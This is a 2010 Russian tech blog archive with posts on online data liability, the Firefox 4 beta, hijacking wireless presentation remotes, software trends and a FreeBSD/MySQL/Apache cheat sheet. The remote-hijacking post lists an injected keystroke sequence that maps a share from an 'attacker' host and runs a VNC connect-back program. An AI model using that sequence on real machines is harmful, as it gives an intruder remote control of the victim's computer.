среда, 7 июля 2010 г.

Интернет нам ничего не должен

Сегодня миллионы пользователей по всему миру хранят свои персональные данные онлайн, с большим удовольствием используют электронную почту и социальные сервисы. Для многих такой способ хранения информации является даже более безопасным, чем на домашнем или рабочем компьютере, так как возможность того, что перестанет работать какой-либо сайт кажется просто невероятной. Но давайте представим, что завтра ваш любимый сервис электронной почты перестал работать и удалил часть писем, среди которых были очень важные. Служба поддержки после длительного молчания сообщает, что данные могут быть восстановлены только через 5-6 дней, резервной копии у вас нет, а нужна эта информация прямо сейчас. Если бы какая-нибудь курьерская служба доставки потеряла несколько писем, на нее можно было бы подать в суд в соответствии с договором. Но в Интернете никто никому ничего не должен, и ответственность за потерю информации никто не несет. Если в популярных сервисах почитать правила использования, то становится понятно, что они перед пользователем практически не несут никакой ответственности в отношении сохранности его информации. Почти все интернет-компании обещают сохранять конфиденциальность пользователя, не допускать попадания его данных в руки третьих лиц, но это пожалуй вся их ответственность.
Думаю не все знают, но Google оставляет за собой право без предупреждения прекращать работу своих сервисов или закрывать доступ пользователей к ним, без последующей возможности получить доступ к хранившейся на серверах информации.
Кроме этого, компания также не несет ответственности за потерю данных пользователей.








Это касается не только Google, но и Microsoft, потеряв данные в онлайн сервисах компании, пользователь сможет получить компенсацию только в том случае, если он пользовался платными услугами. И то, это касается только прямого убытка, и в данном случае сумма не будет превышать ежемесячный платеж за использование услуги.
Microsoft также не несет ответственности за отсутствие доступа к сервису или прекращения обслуживания.









Самое интересное, что предоставляя платные сервисы хранения данных, компании также не несут никакой ответственности за сохранность информации. Заплатив $25 в год за использование расширенной учетной записи в сервисе Flickr, который позволяет хранить неограниченное количество фотографий, пользователь соглашается использовать его «на свой страх и риск».
В целом, вероятность потери информации в Интернете намного меньше, чем на домашнем компьютере. Но слепо верить в безопасность своих данных онлайн - не стоит, важную информацию лучше всего хранить сразу на нескольких носителях. Интернет сегодня - это один из лучших способов хранения и передачи данных, но стоит понимать, что кроме вас самих, за их сохранность никто не несет ответственности.

Mozilla выпустила первую бета-версию браузера Firefox 4

Компания Mozilla представила первую бета-версию Mozilla Firefox 4.



Основные изменения:
  • Заголовки вкладок размещаются в верхней части окна в версии для Windows. Аналогичные изменения в версиях Linux и Mac OS X будут произведены позже, как только будут внесены изменения в темы оформления
  • Новый менеджер расширений
  • Объединение кнопок "Стоп" и "Обновить"
  • Улучшения поддержки новых стандартов: CSS трансформации, WebGL (выключен по-умолчанию), Websockets, HTML History API, форм HTML5
  • Использование видеоускорителя на Mac OS X (через Core Animations) и Windows (через Direct2D)
  • Поддержка кодека WebM
  • Оптимизация и ускорение реакции интерфейса на действия пользователя
  • Блокировка возможности исследования истории пользователя веб-сайтами с использованием CSS :visited
  • Новый парсер HTML5

вторник, 6 июля 2010 г.

Взлом компьютера через радиопульт для презентации



Если вам приходится выступать с презентациями перед большой аудиторией — будьте осторожны! Хакеры нашли способ удалённого взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления. Хуже того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.

1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]

Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.

За последние пару лет опубликован большой объём литературы по безопасности радиоустройств. Известно, что 27-герцовую радиоклавиатуру можно прослушивать с помощью простого прибора, собранного в домашних условиях. Клавиатуры 2,4 ГГц взломали только в конце прошлого года. А теперь пришла очередь 2,4 ГГц устройств для управления презентациями, которые по своему принципу работы не отличаются от клавиатур. Практически во всех таких девайсах используется один и тот же 2,4-гигагерцовый чип CYRF6936 или CYRF69103 производства Cypress Semiconductors, работающий через проприетарный беспроводной протокол.

Прибор для перехвата сигнала можно сконструировать из конструктора Arduino и беспроводного модуля стоимостью 30 евро.

Три основных направления разработки ПО в будущем

(Перевод поста: Top 3 paradigm shifts that will shape the future of developers — Enes TAYLAN)

Компьютерные технологии меняются очень динамично. Новое ПО и железо постоянно разрабатывается в лабораториях, попадает на рынок и становится доступней. Разработчики первыми чувствуют влияние изменений и адаптируются к ним, что бы не остаться на обочине. Поэтому, жизнь в струе помогает нам реагировать раньше, чем остальные. Таким образом я вижу три основных фактора, которые изменят суть разработки ПО в ближайшем будущем.

1. Облачные вычисления






Благодаря Интернету, компьютеры превратились из отдельных рабочих станций в полностью интегрированную среду из многих компьютеров и серверов. Степень интеграции повышается и уже сейчас много приложений работает по облачному принципу. Компании миллиардеры разрабатываю все больше продуктов для облачных вычислений. Стив Балмер заявил, что через два года 95% приложений Microsoft будут работать в облаке. MS Office тоже перестраивается под облачные технологии. Google Docs стал главным инструментом, который мы используем для совместной работы над документами. Мы можем развертывать свои приложения на серверах Amazon, Google Apps, Microsoft Azure или множестве других платформ.

В этот период ключевыми задачами для разработчиков есть:
— фокусирование на web-приложениях: разработка настольных приложений уже не так важна;
— разработчики должны подключать приложения к интернету через web-сервисы и разрабатывать приложения, которые выполняются на web-сервере.

Как адаптироваться:
— изучать web-сервисы (основанные на soap, json, rest…), web-технологии (ASP.NET, JSP …), RIA-технологии (Flex, Silverlight…), программирование web-страниц (Javascript, JQuery…)

2. Многоядерное программирование, параллелизм




Когда ученые поняли, что рост производительности многоядерных вычислительных систем подчиняется закону Мура лучше, чем рост производительности отдельного процессора, парадигма построения многоядерных компьютеров стала основной. Подходы к разработке, которые раньше использовались для разработки ПО суперкомпьютеров теперь стали общими для всех разработчиков.

Суть проблемы проявляется в высказывании Джона Шалфа «Параллельные алгоритмы это не просто распараллеленая версии обычных последовательных алгоритмов. Они требуют других подходов и языков программирования».
Параллельное программирование требует новых подходов. Но некоторые элементы параллелизма появляются в популярных языках программирования.

Как адаптироваться:
— изучайте многопроцессорное программирование и функциональные языки. У функциональных языков программирования нет побочных эффектов. Они естественный выбор для разработчиков параллельных программ.

3. Разработка мобильных приложений





Все больше и больше смартфонов и планшетных ПК появляется на рынке. В 2012 году таких устройств будет продано больше чем обычных ПК.

Ключевые пролемы:
— хотя смартфоны, сейчас, имеют производительность выше, чем в прошлом они еще сильно проигрывают настольным ПК. Поэтому разработка ПО для смартфонов в жестких рамках их ограничений непростая задача;
— программы выполняются на различных платформах или пишутся на новых языках программирования.

Как адаптироваться:
— изучайте новые технологии разработки для мобильных устройств (iPhone, Android, Windows Phone…).

четверг, 1 июля 2010 г.

Вы же уже видили этот фильм не правда ли?

 

Этот фильм стоит посматреть, на многое открывает глаза.

Шпаргалки по FreeBSD

Очередность запуска сервисов FreeBSD.
Посмотреть очередность запуска сервисов в freebsd.
#rcorder /etc/rc.d/* /usr/local/etc/rc.d/*


Запустить или остановить службу можно скриптом, который лежит в папке /etc/rc.d/ .
сетевые службы. Система FreeBSD 5.x/6.x скрипт для работы с сетевыми интерфейсами -> netif . Доступен только для рута (root):

Стартуем FreeBSD сетевую службу:
# /etc/rc.d/netif start
Остановить FreeBSD сетевую службу:
# /etc/rc.d/netif stop
restart FreeBSD сетевую службу:
# /etc/rc.d/netif restart

То-же самое при помощи ifconfig (если много сетевух и нет необходимости "ложить" все сетевые интерфейсы)

положить сетевуху (NIC) внаглую:
# ifconfig network-interface down
Запустить сетевой интерфейс (NIC):
# ifconfig network-interface up
Просмотреть список отключенных интерфейсов:
# ifconfig -d
Список включенных сетевух:
# ifconfig -u

FreeBSD обновить / перезагрузить таблицу маршрутизации (routing)
Обязательно надо обновить "routing table" после перезагрузки сетевой службы:
# /etc/rc.d/routing restart

Сделать все через ssh подключение:

Надо ввести команды как одну. Тогда все выполнится в фоновом режиме и никаких проблем с боевым серваком не возникнет:
# /etc/rc.d/networking restart && /etc/rc.d/routing restart

Утилита make и ее дополнительные команды.








    • make fetch - скачивает приложение(порт).




    • make extract - распаковывает его.




    • make depends - перестроить зависимости.




    • make patch - применить патчи к приложению.




    • make build - собрать приложение из исходных тестов.




    • make clean - "почистить" исходники после сборки.




    • make deinstall - деинсталлировать приложение.




    • make reinstall - переустановить приложение после удаления.




    • make package - построить из порта package.
При необходимости можно использовать принудительную установку приложения(порта) командой: 
make FORCE_PKG_REGISTER=YES install
Смена пользователя под которым работаем в терминале

#su other user (работаем от другого юзера)
#su (работаем от юзера root)


Перезагрузка

#reboot
#shutdown -h now
#shutdown -p now (выключить)

Защищенное распространение дерева портов

/etc/portsnap.conf
Первый запуск (после него обязательно выполнить обновление дерева портов)
#portsnap fetch (примерно 41мб)
#portsnap extract

Обновление дерева портов

#portsnap fetch update
Постоянно обновлять (смысла в этом, как правило, нет)
/etc/crontab
Ежедневно
0 3 * * * root portsnap -I cron update && pkg_version -vIL=

Поиск порта

#whereis <название_порта>
или
#cd /usr/ports
#make search name=<название_порта>
#make search key=
или
#cd /usr/ports
#locate <название_порта>

Работа с портами

./configure - конфигурация пoрта/пакета (настройки конфигурации порта по умолчанию
хранятся в папке /var/db/ports/_имя_порта_ удаляем настройки #rm -dfr /var/db/ports/_имя_порта_)
make configure - аналог ./configure
make - сборка
make instal - устанoвка
make clean - убрать мусор текущего порта или весь если дать из /usr/ports
make all install clean - установить и сразу убрать мусop
make deinstal - удалить пopт, при этом конфиги и данные надо будет удалить вручную
make reinstal - переустанoвить порт
portupgrade - переустановка порта
pkg_info - информация о установленных портах

Работа с архивами

tar -zxvf <архив> - распаковать tar.gz
tar -xvf <архив> - распаковать в tar
tar -zcvf <архив> <что_архивировать> - запаковать в tar.gz

Оболочки

MC - Midnight Commander
#cd /usr/ports/misc/mc
#make install clean
bash
/etc/shells
/usr/local/bin/bash
pw usermod root -s /usr/local/bin/bash
/.profile

Редактиpoвать файл в прoстом редакторе

#ee filename

WGET - удобная качалка файлoв

#cd /usr/ports/ftp/wget
#make install clean

Проверить открытые сетевые порты

#netstat -na | grep LIST

или

#netstat -an |grep LISTEN

Монтирование дискеты DOS

#/sbin/mount -t msdos /dev/fd0 /mnt
#cp chmod.txt /mnt
#/sbin/umount /mnt - размонтировать

Монтирование CD-ROM

#/sbin/mount /cdrom
#/sbin/umount /cdrom

Монтирование Флешки

# mount -t msdosfs /dev/da0s1 /media/flash

Показывает место на диске

#df

Поиск файла

#find /usr -name "filename"

Администрирование сервера через бесплатную панель управления WebMin

#whereis webmin
#cd /usr/ports/sysutils/webmin
#make install
#/usr/local/lib/webmin/setup.sh ; скрипт запуск настройки
в /etc/rc.conf добавить webmin_enable="YES"
default port:10000 - задайте другoй нестандартный порт

Установка MySQL

#mkdir /usr/local/distr
#mkdir /usr/local/src
#cd /usr/local/distr
#wget <путь_к_дистрибутиву>mysql-5.0.45.tar.gz
#распаковать в папку /usr/local/distr
#pw groupadd mysql
#pw useradd mysql -g mysql -d /usr/local/mysql -s /dev/null
#cd /usr/local/distr/mysql-5.0.45
#./configure --prefix=/usr/local/mysql --with-mysqld-user=mysql --with-charset=cp1251 --with-collaption=cp1251_general_ci
#make
#make install
#cp support-files/my-medium.cnf /etc/my.cnf
#cd /usr/local/mysql
#chown -R mysql
#chgrp -R mysql
#bin/mysql_install_db -user=mysql
#chown -R root
#chown -R mysql var
#bin/mysqld_safe -user=mysql &
в /etc/rc.conf добавить mysql_enable="YES"
меняем рутовый пароль #/usr/local/mysql/bin/mysqladmin -u root password 'new_pass'
правим настройки MySQL в WebMin, стартуем и уже можно настроить пользователей и БД из панели управления

Установка Apache 2.2.6 и PHP 5.2.4 в связке

Скачиваем httpd-2_2_6.tar.gz и php-5.2.4.tar.gz в /usr/local/distr

cd /usr/local/distr
tar xzvf httpd-2_2_6.tar.gz
cd httpd-2_2_6
./configure --enable-so
make
make install
Apache ставится в /usr/local/apache2
/usr/local/apache2/bin/apachectl start - запуск сервера
/usr/local/apache2/bin/apachectl stop - остановка сервера
/usr/local/apache2/bin/apachectl graceful - перезагрузка без "убийства" текущих соединений
в /etc/rc.conf добавить apache_enable="YES" для автозапуска
/usr/local/apache2/conf/httpd.conf - основные настройки
/usr/local/apache2/conf/extra - каталог с файлами дополнительных настроек в т.ч. виртуальных хостов

Установка PHP:

tar xzvf php-5.2.4.tar.gz
./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql
make
make install
Для переустановки достаточно повторить три последних команды ./configure, make и make install
cp php.ini-dist /usr/local/lib/php.ini - найстройки нужно отредактировать
LoadModule php5_module modules/libphp5.so - для PHP 5 добавляем эту строку в настройки apache - httpd.conf
LoadModule php4_module modules/libphp4.so - для PHP 4 добавляем эту строку в настройки apache - httpd.conf
AddType application/x-httpd-php .php .phtml - добавляем в httpd.conf, расширения которые будет обратабывать PHP
/usr/local/apache2/bin/apachectl start - запускаем Apache и проверяем работу PHP

PhpMyAdmin

Ставим из портов (можно просто скачать архив и распаковать его):
#whereis phpmyadmin
/usr/local/www/phpMyAdmin
config.inc.php